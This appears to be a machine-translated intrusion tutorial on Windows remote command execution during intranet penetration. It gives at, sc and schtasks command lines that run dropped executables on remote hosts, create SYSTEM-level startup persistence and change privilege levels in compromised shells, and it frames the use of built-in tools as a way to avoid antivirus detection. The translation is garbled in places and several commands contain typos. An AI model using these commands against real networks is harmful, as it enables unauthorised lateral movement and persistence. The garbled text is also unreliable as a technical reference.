Windows environment penetration Remote Command Execution

This article mainly introduces the built-in tools of the system, so there is no need to consider many kill-free issues. Killing-free and active defense are both headaches. For so long, I have used the following methods to meet most of the requirements. 1. Use scheduled task at, a common method. (System permission) at \ 10.1.1.1 cmd/c "ipconfig/all> c: \ recycler \ ip.txt" 2. 1. Use the SC tool (system permission) SC \ 10.1.1.1 create winnt binpath = c: \ cmd.exe SC \ 10.1.1.1 start winnt SC \ 10.1.1.1 delete winnt 2.2 Use the SC service tool (specify user permissions to start) SC \ 10.1.1.1 create adminsec binpath = "c: \ pass.exe" obj = "adminsec \ administrator" passwrod = adminsecsc \ ip start testsrvname // if the execution is successful, error 1053 may be displayed, it is not suitable for use as a startup Item. Generally, user permissions are temporary. One time is enough. You can understand what to do and what to do with intranet penetration. 3. Using the schtasks command, you can use user permissions or system permissions. Permission control is better. Schtasks system permission start. For example, c: \ recycler \ adminsec.exe is executed every time the computer starts from 28/09/2012. Schtasks/create/tn "My App"/tr c: \ recycler \ adminsec.exe/SC onstart/sd 28/09/2012/ru "NT AUTHORITY \ SYSTEM" schtasks user permission to start, for example, c: \ recycler \ adminsec.exe is executed every time the computer starts from 28/09/2012. Schtasks/create/tn "My tasks"/tr c: \ adminsec. bat/SC once/ST 10:10:00/ru "NT AUTHORITY \ SYSTEM" // start once, custom bat content. User Permissions are usually required during penetration. When your current shell is the system permission. You can use this to change to the current user permission. Runas requires a password, which is not suitable for shell with poor interaction. The following domain environments also apply. Schtasks/create/tn "adminsec tasks"/tr "c: \ adminsec.exe/shtml c: \ recycler \ pass.html "/SC/once/st 10:10:10/ru" user "/rp" pwd "3.1 stchtasks command cannot use at \ 10.1.1.1 cmd/c" ipconfig/all> c: \ recycler \ ip.txt "startup, which is generally written as bat startup. The 3.2 stchtasks command does not support onstart and/sd parameters in windows 2003. 3.3 The stchtasks command has different date formats in different language systems, and cannot be successfully created without looking at scheduled tasks. For example, in the English System: 28/09/2012 Chinese System: 2012/12/12 3.4 stchtasks. If the path contains spaces, special processing is required. Otherwise, the task cannot be started successfully. For details, see: http://www.bkjia.com/os/201212/178498.html